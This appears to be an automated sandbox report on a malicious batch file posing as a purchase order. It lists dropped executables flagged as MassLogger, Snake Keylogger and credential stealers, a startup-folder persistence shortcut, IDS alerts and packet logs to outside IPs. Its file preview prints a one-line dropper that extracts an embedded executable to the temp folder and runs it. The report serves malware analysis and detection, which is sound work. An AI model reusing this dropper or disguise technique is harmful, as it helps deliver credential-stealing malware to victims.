Encrypted:	false
SSDEEP:	384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
MD5:	CCE3C4AEE8C122DD8C44E64BD7884D83
SHA1:	C555C812A9145E2CBC66C7C64BA754B0C7528D6D
SHA-256:	4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
SHA-512:	EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
Malicious:	false
Preview:	.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rpkhzpuO.pif.log

Download File

Process:	C:\Users\Public\Libraries\rpkhzpuO.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.355496254154943
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
MD5:	3C255C75EA6EB42410894C0D08A4E324
SHA1:	34B3512313867B269C545241CD502B960213293A
SHA-256:	116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
SHA-512:	41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380747059108785
Encrypted:	false
SSDEEP:	48:lylWSU4xc4RTmaoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:lGLHxcIalLgZ2KRHWLOug8s
MD5:	8D9F4223D56DB7DB17A74A3253281700
SHA1:	1DDEAEDA99D8DBBD060FFD26D1928F3A9DA8C2B9
SHA-256:	C725BD02DDEAB391F1DB1D4562849ECED0FBD992DD757404F991F0ED7AB4A66B
SHA-512:	08F061B1B49B4FF1C5AF1C18AB00A9CAF32EE9054F42CD672B70AB9D549BC61815E358649F8C160813A48052F13B2EF12BD7B9B74BD39D850D3A027227C9D3C0
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.ConfigurationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\Microsofts.exe

Download File

Process:	C:\Users\Public\Libraries\rpkhzpuO.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	98816
Entropy (8bit):	5.666546286050177
Encrypted:	false
SSDEEP:	1536:qwa4JaIFveZKGAmwJVeDhp0dqnjErVf4UMR7pspNYZd:24Jj4ZKGHwJVeDDKqnj6bMDspNC
MD5:	F6B8018A27BCDBAA35778849B586D31B
SHA1:	81BDE9535B07E103F89F6AEABDB873D7E35816C2
SHA-256:	DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
SHA-512:	AA958D22952D27BAD1C0D3C9D08DDBF364274363D5359791B7B06A5D5D91A21F57E9C9E1079F3F95D7CE5828DCD3E79914FF2BD836F347B5734151D668D935DE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 91%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nH...............P..x............... ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...................Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....&..( .....s!........s"........s#........s$........s%........Z........o8...........&..(9....&........".......Vs....(B...t...........(C..."~....+."~....+."~....+."~....+."~....+.b.r...p.oa...(....(@....:.~.....o....&.:.(P....(Q......~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...

C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

Download File

Process:	C:\Users\Public\Libraries\rpkhzpuO.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	4.910353963160109
Encrypted:	false
SSDEEP:	1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
MD5:	E91A1DB64F5262A633465A0AAFF7A0B0
SHA1:	396E954077D21E94B7C20F7AFA22A76C0ED522D0
SHA-256:	F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
SHA-512:	227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3ppoasy.n2z.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvlywn24.vwz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p2iwfyow.uzf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qve5jyr5.acw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\x.exe

Download File

Process:	C:\Windows\System32\extrac32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1242624
Entropy (8bit):	7.0624316017893145
Encrypted:	false
SSDEEP:	24576:PP+c4OuuuRyxjoSJmjtHXyzvWZS2kCxG2JRxVuYbdxiHA:PmJjW4ZHXyB2kX2Jv/bdx
MD5:	EE363121466EE051042410AFFFEA28EF
SHA1:	F528897FD071AF01778FB37BC3D6E320012176A8
SHA-256:	CD73EEBF2B36EB1BC4DFD5C4D5337AE41E5C49346523CB03202F116DFC838533
SHA-512:	5DC645388DE2F6B17207F78BACED71947874B7813C6DAE129F00AB6FC965DB956ABE8025E706F4A68153FEFFC49EDF2459320846C1D508D733C14B6E4A4BA77B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B..................................... ....@..............................................@...............................(...p..................................................................................L............................text...@........................... ..`.itext.............................. ..`.data....)... .....................@....bss.....8...P...........................idata...(.......*..................@....tls....4............X...................rdata...............X..............@..@.reloc...............Z..............@..B.rsrc........p......................@..@....................................@..@................................................................................................

C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	665670656
Entropy (8bit):	7.9999993950214465
Encrypted:	true
SSDEEP:
MD5:	1EC1BD626F8EA04635D66113E34C4733
SHA1:	226FEE707F17B418BCBE1720B300BF2A2C6FFE4E
SHA-256:	DF8826EF3E673F77D3A93A81A20EAC2955535BC103814B79B7C9C01251E30A17
SHA-512:	59C060C92D79598F04A48B1CAB4ED0677116DCC2FBE26AA641694DBB22BCAE3BA3069C9CF31DE5F8718629ECCB513730CD246F45274A0AABE151AF453D17BB30
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:	MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=
Category:	dropped
Size (bytes):	1820
Entropy (8bit):	2.4170562931013335
Encrypted:	false
SSDEEP:	12:8PsXU1e/tz0/CSL4WWeMNDyWlT9KBQ17+AUvO4Zv7L1Q17+ANCNfBf4t2YZ/elFR:80vWLqeMNmG9KmR+O4ZvPqRMjqy
MD5:	6F855ED56D27EB1076AF8E6BCB1CF43D
SHA1:	F051846AF399F2FC3A9A4DB8FCCF3E608B0614F7
SHA-256:	463C757C60408A5879898FFC4E201BFBE6087ED567E7DAED1B5C454AFBDD62BA
SHA-512:	6EC6DCB51FF117F2FEB40E358AB7D493792046783D5CF30384D8EF18AE1D8332F31FFFA5D05F3C52A2564A943E087A41A119AACAF0FFB39F5BB8FFB0AE707F8F
Malicious:	false
Preview:	L..................F.@......................................................5....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....T.1...........ACCApi..>............................................A.C.C.A.p.i.....b.2...........apihost.exe.H............................................a.p.i.h.o.s.t...e.x.e.........A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.4.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe...............................................................................................................

Static File Info

General

File type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 38 datablocks, 0 compression
Entropy (8bit):	7.06197212646245
TrID:	Microsoft Cabinet Archive (8008/1) 99.91% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
File name:	PO#5_Tower_049.bat
File size:	1'243'067 bytes
MD5:	0d8e4971994af9eae92707005997ad14
SHA1:	3473ecb4f88d6ceb8ab7e085bbd7f7a2bc199aea
SHA256:	6c76b0654fd88351436c641c0c81abb399a8f37702e9f8375d71283a75274f6b
SHA512:	bcc633c193f0fa7061d85711a9cbe18878ef5b37b887da6755c2ef1eb0a99354b4e6a892a5535b4e4c82e1ac9ea9e1914c3f42a6ffb02b45a756a2aa21645b07
SSDEEP:	24576:DPqcoOuSSRyxPUSJyvZnXizzylSGoChSiJdxVucbddiHg:DS5bGExnXilGojiJLzbdd
TLSH:	37459CD3F2900477E0F70D754D0B5A9A7B33BE312E64A4563BE82B48CF39A912927356
File Content Preview:	MSCF............u.......................&.......cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe".................. .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T20:39:58.523792+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	41.185.8.252	443	TCP
2025-01-03T20:40:15.972518+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49706	158.101.44.242	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 20:39:57.440507889 CET	49704	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:57.440550089 CET	443	49704	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:57.440635920 CET	49704	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:57.442800999 CET	49704	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:57.442852020 CET	443	49704	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:57.443000078 CET	49704	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:57.489146948 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:57.489181995 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:57.489240885 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:57.490756035 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:57.490772009 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:58.523726940 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:58.523792028 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:58.527564049 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:58.527575016 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:58.527843952 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:58.571647882 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:58.619337082 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.093470097 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.093497038 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.093507051 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.093538046 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.093554020 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.093569994 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.093583107 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.093592882 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.093592882 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.093616962 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.093638897 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.278887033 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.278908968 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.278975010 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.278989077 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.279088020 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.487822056 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.487843037 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.487987995 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.488002062 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.488168001 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.489377022 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.489392042 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.489540100 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.489547968 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.491125107 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.491144896 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.491213083 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.491213083 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.491221905 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.493577003 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.535011053 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.535029888 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.535121918 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.535121918 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.535130024 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.535191059 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.714962959 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.714979887 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.715073109 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.715095043 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.715110064 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.715217113 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.715734959 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.715749979 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.715841055 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.715841055 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.715848923 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.715914965 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.716497898 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.716522932 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.716598034 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.716598034 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.716603994 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.716886044 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.717493057 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.717508078 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.717582941 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.717588902 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.717617035 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.717727900 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.719933033 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.719948053 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.720040083 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.720040083 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.720046043 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.720182896 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.720911980 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.720931053 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.721002102 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.721002102 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.721008062 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.721103907 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.746623993 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.746639013 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.746691942 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.746697903 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.746725082 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.746834993 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.806438923 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.806456089 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.806526899 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.806535959 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.806603909 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.926366091 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.926384926 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.926465034 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.926474094 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.926522017 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.926837921 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.926852942 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.926927090 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.926927090 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.926934004 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.927109003 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.927335978 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.927352905 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.927515984 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.927520990 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.927577019 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.927598000 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.927613020 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.927618027 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.927630901 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.927747011 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.927927971 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.927942991 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.928020954 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.928025961 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.928113937 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.928306103 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.928320885 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.928452015 CET	49705	443	192.168.2.5	41.185.8.252
